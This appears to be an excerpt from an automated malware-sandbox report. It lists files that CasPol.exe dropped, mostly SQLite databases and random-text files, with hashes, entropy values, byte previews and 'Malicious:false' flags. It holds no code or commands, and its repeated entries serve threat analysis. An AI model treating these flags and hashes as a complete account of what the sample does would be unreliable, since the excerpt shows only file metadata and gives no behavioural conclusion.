                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.696178193607948
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                          MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                          SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                          SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                          SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                          Malicious:false
                                                                                          Preview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
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.6998645060098685
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                          MD5:1676F91570425F6566A5746BC8E8427E
                                                                                          SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                          SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                          SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                          Malicious:false
                                                                                          Preview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
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.697358951122591
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                          MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                          SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                          SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                          SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                          Malicious:false
                                                                                          Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                          Category:dropped
                                                                                          Size (bytes):1835008
                                                                                          Entropy (8bit):4.421881130653811
                                                                                          Encrypted:false
